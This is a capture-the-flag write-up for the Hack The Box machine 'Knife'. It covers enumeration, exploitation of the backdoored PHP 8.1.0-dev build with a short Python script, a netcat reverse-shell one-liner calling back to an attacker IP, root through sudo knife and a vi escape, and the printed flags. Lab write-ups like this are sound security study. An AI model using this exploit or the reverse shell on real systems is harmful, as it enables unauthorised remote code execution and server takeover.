Knife

Name: Knife
Release Date: 22 May 2021
Retire Date: 28 Aug 2021
OS: Linux
Base Points: Easy - Retired [0]
jkr 00 days, 00 hours, 13 mins, 43 seconds
jkr 00 days, 00 hours, 19 mins, 31 seconds
Creator: MrKN16H7
Pentest Workstation PDF: Knife.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.242

Sidenote: Newer Kali releases no longer log in as root by default, so AutoRecon has to be run with sudo: the nmap UDP (and SYN) scans it launches use raw sockets, which require root.

We have SSH (TCP 22) and HTTP (TCP 80) as the major ports to look at right now. Gobuster found a few pages and directories that could be interesting:

┌──(kali㉿kali)-[~/Desktop/HTB/Knife]
└─$ gobuster dir -u http://10.10.10.242 -w /usr/share/seclists/Discovery/Web-Content/common.txt -o gobusterKnife.out 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.242
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 13:58:51 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

===============================================================
2022/01/17 14:00:03 Finished
===============================================================

Let's navigate to index.php and look at the response headers and the page source.

Jackpot! The X-Powered-By response header reports PHP/8.1.0-dev. That is not a legitimate release: 8.1.0-dev was the development build carrying the backdoor planted in the php-src repository in March 2021. A server running it treats a request header named User-Agentt whose value starts with the word zerodium as PHP code and evaluates everything after that word, so a header of User-Agentt: zerodiumsystem("id"); runs id as the web server user. Running a simple searchsploit php 8.1.0-dev turns up exactly that: an RCE exploit at /usr/share/exploitdb/exploits/php/webapps/49933.py

From here we can cat the user flag, but we cannot move around: every command is a separate HTTP request, so there is no persistent shell and no working directory to cd into.


$ cat /home/james/user.txt
3bef3aa89f14c500983d38bc0514434d

We need to figure out a way to upgrade that terrible shell, but first let's check sudo -l. It shows that james can run /usr/bin/knife as root, and the command works from our non-interactive shell without a password prompt.

OK. Maybe we don't need to upgrade the shell... Let's check what knife really is (besides a Ruby script). knife is the command-line tool for Chef, and its man page shows that knife data bag create BAG ITEM -e EDITOR opens the new item in whatever editor you name. Because we run knife through sudo, that editor runs as root. Seems easy. Let's try it with vi, because :!/bin/bash escapes vi into a shell, and here that shell would be root's.

sudo /usr/bin/knife data bag create 1 2 -e vi

:!/bin/bash

Well that didn't work. The terrible shell strikes again: vi needs a terminal, and our command-per-request channel has none, so the editor never gets to the point where we can type the escape. Let's nc back to our attacking box and get a proper reverse shell instead. First, let's trim the exploit down to the part we need:

#!/usr/bin/env python3
# Minimal runner for the PHP 8.1.0-dev backdoor (same technique as 49933.py).
import requests
from sys import argv, exit

if len(argv) < 3:
    print("[!] Supply the URL and command to run")
    exit(1)

# Everything after the word "zerodium" in the User-Agentt header is evaluated
# as PHP by the backdoored build, so this header becomes system("<command>");
header = {"USER-AGENTT": "zerodiumsystem(\"" + argv[2] + "\");"}
url = argv[1]

r = requests.get(url, headers=header)
# The command output is emitted before the page's own HTML, so keep only the
# part of the body that precedes the <!DOCTYPE html> marker.
print(r.text.split("<!DOCTYPE html>")[0])

 

With this setup we provide two arguments, the URL and the command. Start a listener on the attacking box first (nc -lvnp 1337), then fire the reverse shell:

python3 exploit.py http://10.10.10.242 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 1337 >/tmp/f"

 

MUCH better! The listener catches an interactive shell as james. If vi complains about the terminal in this shell, upgrade it to a pseudo-terminal first with python3 -c 'import pty; pty.spawn("/bin/bash")'. Let's try the knife trick again. SUCCESS!

root@knife:/# cat /root/root.txt
e4ad28aed3fd6c46bec92b6be7e4df45

Escaping VIM is fun! Gotta love those GTFOBins! Claim VICTORY! This box is slashed!

.........

I'll see myself out XD